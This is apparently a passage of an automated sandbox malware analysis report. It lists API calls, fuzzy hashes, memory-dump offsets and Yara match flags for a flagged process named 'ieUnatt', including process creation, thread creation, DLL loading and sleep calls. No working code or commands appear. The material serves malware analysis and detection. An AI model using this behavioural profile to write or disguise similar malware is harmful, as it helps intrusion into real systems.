                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 8711df03de044438dfb7598a24794461ae8bee29b0ef04086235251ec6a71f1c
                                                                                                                                                          • Instruction ID: ad7a75c4ef150440df77cca3d2e9ef93f859749525f1a0b6bdd2cf8c27e7bdc7
                                                                                                                                                          • Opcode Fuzzy Hash: 8711df03de044438dfb7598a24794461ae8bee29b0ef04086235251ec6a71f1c
                                                                                                                                                          • Instruction Fuzzy Hash: 80900221211C0046F20175684C14B0704058BD0307F55C616B515D555CC915D9B55922
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: a7a2e63e01a948aa0de7bcec8018dd498d8e93231330a5ada9ce05c72ed06dc4
                                                                                                                                                          • Instruction ID: a3d6fd817569d646ec1368e45e67a60280f6380be73836ae1f801e9895723039
                                                                                                                                                          • Opcode Fuzzy Hash: a7a2e63e01a948aa0de7bcec8018dd498d8e93231330a5ada9ce05c72ed06dc4
                                                                                                                                                          • Instruction Fuzzy Hash: 7C90026134140446F10171584414B060405CBE1305F55C516F606D555D8619DDA66527
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: fe1187f48d47ab783ad3c7599bf6fc46186219b34b78e58db965033e3274511e
                                                                                                                                                          • Instruction ID: fe4d64b680622af6a36c387f3bc8509add5485d761b4bdf545b3a739e3b070a1
                                                                                                                                                          • Opcode Fuzzy Hash: fe1187f48d47ab783ad3c7599bf6fc46186219b34b78e58db965033e3274511e
                                                                                                                                                          • Instruction Fuzzy Hash: 0390022124545106F151715C44046164405ABE0205F55C522B581D595D8555D9A96622
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 2baf9e84e34425911fd7dd770ec6cd3d22f3fc8defd8b6c3d11db07f78e99f66
                                                                                                                                                          • Instruction ID: b002380be8279f639bb32b511a56841c213e9f2b6524c25aad4f41b54ef82f60
                                                                                                                                                          • Opcode Fuzzy Hash: 2baf9e84e34425911fd7dd770ec6cd3d22f3fc8defd8b6c3d11db07f78e99f66
                                                                                                                                                          • Instruction Fuzzy Hash: EC900225211400072106B558070450704468BD5355355C522F601E551CD621D9B55522
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 8dd97df0e4e081f54b08e236960a5c48d185d1b5bf21cb02027314d5fd04bf64
                                                                                                                                                          • Instruction ID: 23583d70cb0577d21dec69e2df25888d11fba643ec95e744325e1b2b632e4b5f
                                                                                                                                                          • Opcode Fuzzy Hash: 8dd97df0e4e081f54b08e236960a5c48d185d1b5bf21cb02027314d5fd04bf64
                                                                                                                                                          • Instruction Fuzzy Hash: D7900225221400062146B558060450B08459BD6355395C516F641F591CC621D9B95722
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: ec0ef1ae826ff5f19b0da0fb6729860ba7c33f8cfc0c5dea54cecebcd7d07239
                                                                                                                                                          • Instruction ID: ae8bdbf3f3817f7bb6df84ddf6c7ae9b58bebe670e7d49fba10342f23b3210a1
                                                                                                                                                          • Opcode Fuzzy Hash: ec0ef1ae826ff5f19b0da0fb6729860ba7c33f8cfc0c5dea54cecebcd7d07239
                                                                                                                                                          • Instruction Fuzzy Hash: 8590023160540806F1517158441474604058BD0305F55C512B502D655D8755DBA97AA2
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: c9a0f092116ca1f818b0aa8a654999c971d87a4136b1611e8e249d6f98862015
                                                                                                                                                          • Instruction ID: caa851bd0fe58b0f3f208ce02b4a4aa33a621c0afb62008bd1fb25506b3d6a23
                                                                                                                                                          • Opcode Fuzzy Hash: c9a0f092116ca1f818b0aa8a654999c971d87a4136b1611e8e249d6f98862015
                                                                                                                                                          • Instruction Fuzzy Hash: CE90023120544846F14171584404A4604158BD0309F55C512B506D695D9625DEA9BA62
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 4a6b38245be13917a72c6d36768810ad969e1d60eb20c3456263a06ce96e3956
                                                                                                                                                          • Instruction ID: 22b769b4f09fd1e41118c3b53b4a6cb2aaa4f767618a4b7b2452a0a8a1601270
                                                                                                                                                          • Opcode Fuzzy Hash: 4a6b38245be13917a72c6d36768810ad969e1d60eb20c3456263a06ce96e3956
                                                                                                                                                          • Instruction Fuzzy Hash: 6390023120140806F1817158440464A04058BD1305F95C516B502E655DCA15DBAD7BA2
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: d8317967d3ba504a0dc3505f0472858511201d075ee637881091e5d38576ae9a
                                                                                                                                                          • Instruction ID: 459b02b73d48415d833ea91a61574ee75f41585127c169b6f6dd700e731ec2b2
                                                                                                                                                          • Opcode Fuzzy Hash: d8317967d3ba504a0dc3505f0472858511201d075ee637881091e5d38576ae9a
                                                                                                                                                          • Instruction Fuzzy Hash: 4C90026120240007610671584414616440A8BE0205B55C522F601D591DC525D9E56526
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 0294353B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep
                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                          • Opcode ID: a305be0244f2741d600154728a70c75b9dc333cd5d35b62fffcb1686b85d7fad
                                                                                                                                                          • Instruction ID: 41c35e49bcc0a195894760c8a3e2175e204e9dd4c9f2ae0891088ed19ce31746
                                                                                                                                                          • Opcode Fuzzy Hash: a305be0244f2741d600154728a70c75b9dc333cd5d35b62fffcb1686b85d7fad
                                                                                                                                                          • Instruction Fuzzy Hash: E3316DB1A00305BBD714DFA4CC84FEABBB9FB84714F508558E55DAB240DB70AA41CFA4
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: @J7<
                                                                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                                                                          • Opcode ID: 21edd2b21c567908329a4476620a245784a7d5de8ddcbebbeef8ce350c067e49
                                                                                                                                                          • Instruction ID: 656cf40f3c3c02841953ff716a5885c2be33c1bd8029aa74a9002ce788afe5af
                                                                                                                                                          • Opcode Fuzzy Hash: 21edd2b21c567908329a4476620a245784a7d5de8ddcbebbeef8ce350c067e49
                                                                                                                                                          • Instruction Fuzzy Hash: 9D3130B6A0060AAFDB10DF98D880DEEB7B9FF88304F108559E545EB214D775EE45CBA0
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: @J7<
                                                                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                                                                          • Opcode ID: 631fe04696cde82329d99c7f592456ff632a06c1573ebb3ca2dbb9f8c0565a5c
                                                                                                                                                          • Instruction ID: a137e3b4b8480d8f386fe33dbf5076755358aa2df68e9717f151e39b9265b054
                                                                                                                                                          • Opcode Fuzzy Hash: 631fe04696cde82329d99c7f592456ff632a06c1573ebb3ca2dbb9f8c0565a5c
                                                                                                                                                          • Instruction Fuzzy Hash: 893110B6A0060AAFDB00DFD8D880DEEB7B9BF88304F108559E505EB214D775EE05CBA0
                                                                                                                                                          APIs
                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02933FE2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                          • Opcode ID: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                                                                                                                          • Instruction ID: 6db7a13e9dde26cb48e54ab6930c8ac7f5e5c6f84a2d64126cecf93c22f195ba
                                                                                                                                                          • Opcode Fuzzy Hash: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                                                                                                                          • Instruction Fuzzy Hash: 3F01DEB5D4020DBBDB10EBE4DC42F9DB7B99B54708F1042A5E90897281FA71EB58CB91
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02937D3E,00000010,?,?,?,00000044,?,00000010,02937D3E,?,?,?), ref: 029490D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                          • Opcode ID: 8af7d9bb6f7632d862b15ee109bec87760659d04315d7bbcf506ca33b4f57a6b
                                                                                                                                                          • Instruction ID: 2e5a776d8544515f788766cec9ba054556d9c2f195c0ff75c5ca4c2c93a007ab
                                                                                                                                                          • Opcode Fuzzy Hash: 8af7d9bb6f7632d862b15ee109bec87760659d04315d7bbcf506ca33b4f57a6b
                                                                                                                                                          • Instruction Fuzzy Hash: 70018CB2215149BBCB44DE89DC91EEB77AEAF8C754F418209BA0DE3244D630F8518BA4
                                                                                                                                                          APIs
                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929AF2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 1fa97690facf0df6b5bfe81736ee18fec5ad6dccd46083179f92b8971ce90521
                                                                                                                                                          • Instruction ID: 8dbbda00505daca3554ca46485ec7130c988ca9d597401556d5c16a8595d9afd
                                                                                                                                                          • Opcode Fuzzy Hash: 1fa97690facf0df6b5bfe81736ee18fec5ad6dccd46083179f92b8971ce90521
                                                                                                                                                          • Instruction Fuzzy Hash: 3AF0E57335071436E220A5999C42FD7769DDFC1B65F140425F60CEB1C4DD95F44146F5
                                                                                                                                                          APIs
                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929AF2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 66fe20a9da98a457223dee2dc30c0e9bc152a0247b85544eddcb6d8206663a48
                                                                                                                                                          • Instruction ID: 7e53c4b5a86e04460d5c9b42d4a88721c0ba872fc02d9595847383656320030b
                                                                                                                                                          • Opcode Fuzzy Hash: 66fe20a9da98a457223dee2dc30c0e9bc152a0247b85544eddcb6d8206663a48
                                                                                                                                                          • Instruction Fuzzy Hash: 96F092732402143AE230A6A89C42FD7775CDFC1B55F240029F60CEB2C4DEA2B44146F4
                                                                                                                                                          APIs
                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02947CE0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$NameName_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3514427675-0
                                                                                                                                                          • Opcode ID: 59674a61cc737f16b72bfc01262ad3fb2bf4e5aa36473d00480b26c9b1b88e31
                                                                                                                                                          • Instruction ID: 37145e71859980c44d286aa4932e25922d7e6ed9dcb42450b691c4373372986b
                                                                                                                                                          • Opcode Fuzzy Hash: 59674a61cc737f16b72bfc01262ad3fb2bf4e5aa36473d00480b26c9b1b88e31
                                                                                                                                                          • Instruction Fuzzy Hash: 57F039B52002047FDA10EF99DC40EAB77AEEFC9754F008018FA08A7241C670B8148BF5
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(029314B6,?,029450BB,029314B6,0294504F,029450BB,?,029314B6,0294504F,00001000,?,?,00000000), ref: 02948FE9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction ID: be781c62418a0cd28140643f42728e7160078eea310230db250ba5067f0bca0d
                                                                                                                                                          • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction Fuzzy Hash: EFE06D71204204BBDA14EE98DC40FAB37ADEFC8714F104008F908A7241C670B910CBF4
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,029337F9,000000F4), ref: 02949029
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                          • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction ID: 1c7cf60984f15e3667c4ee787167714bbc727690e515c2e17cf52596aab45a07
                                                                                                                                                          • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction Fuzzy Hash: AEE0E5B2200214BBD614EF99DC81FAB77ADEFC9711F004419FA08A7241DA70B924CAB8
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02937DA9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: d4e30afd0c358c12d72434dd1035a0bb27107a7d8032385a01a6e12e228f64cd
                                                                                                                                                          • Instruction ID: 2053d5447e35d12fd7fb0f536da2943a9d5b4585acbce4c17c7c74e8e54d2d46
                                                                                                                                                          • Opcode Fuzzy Hash: d4e30afd0c358c12d72434dd1035a0bb27107a7d8032385a01a6e12e228f64cd
                                                                                                                                                          • Instruction Fuzzy Hash: 15E086B124070867EB14A9E8DC86FF6339C8F48B68F184650F96DDF2D1DA78F54246A0
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02937DA9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: e32b57d803266b7a3db74eadc885f6a0515cecda4865c7f8ae4a4548ae6cee48
                                                                                                                                                          • Instruction ID: 21c6ecf922344491c9315c25a2bb0fd7e1d831ad325174c4980c55dba0fea7da
                                                                                                                                                          • Opcode Fuzzy Hash: e32b57d803266b7a3db74eadc885f6a0515cecda4865c7f8ae4a4548ae6cee48
                                                                                                                                                          • Instruction Fuzzy Hash: 9DE020B124060466EB159574CC82FF5371C4F44B2CF144610F5A8CF3D1D735E1034670
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,029317A0,0294798F,0294504F,0293176D), ref: 02937BA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 85699f68776da8b7fcb378b6bbec137ed8f49c4f8c17adf330f066e5fae7177e
                                                                                                                                                          • Instruction ID: f394128dcfa308c201775788ad1d3a48fa741e67ad24a9b00a840fbc70724189
                                                                                                                                                          • Opcode Fuzzy Hash: 85699f68776da8b7fcb378b6bbec137ed8f49c4f8c17adf330f066e5fae7177e
                                                                                                                                                          • Instruction Fuzzy Hash: 5AE086712843156BE301A6B58C0AF45361D5F54B44F158068B5CCEF2D2DA50E0208B91
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,029317A0,0294798F,0294504F,0293176D), ref: 02937BA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 9e3693fbf4695692d98aaa9d7cfb83535e316e56fd49d26c2873089d129ecd00
                                                                                                                                                          • Instruction ID: a8eaa3a3e6d1b30f427cd6cefa25b29937234b1c95ea1f660c19ee1bc6c93e39
                                                                                                                                                          • Opcode Fuzzy Hash: 9e3693fbf4695692d98aaa9d7cfb83535e316e56fd49d26c2873089d129ecd00
                                                                                                                                                          • Instruction Fuzzy Hash: 45D05EB12803087BE640FAE5CC03F86365D9B80B98F058028B94CE72C2DD55F4104AA5
                                                                                                                                                          APIs
                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111), ref: 02930897
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_2920000_ieUnatt.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                          • Instruction ID: a449fc04c45ab2bc86d232dba00188fe061f49e6e2317e58cf931b48ba185816
                                                                                                                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                          • Instruction Fuzzy Hash: 20D0A967B0000C3AAA024584ACC1DFEB72CEB84AA6F004063FB08E2040E62289020AB1
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
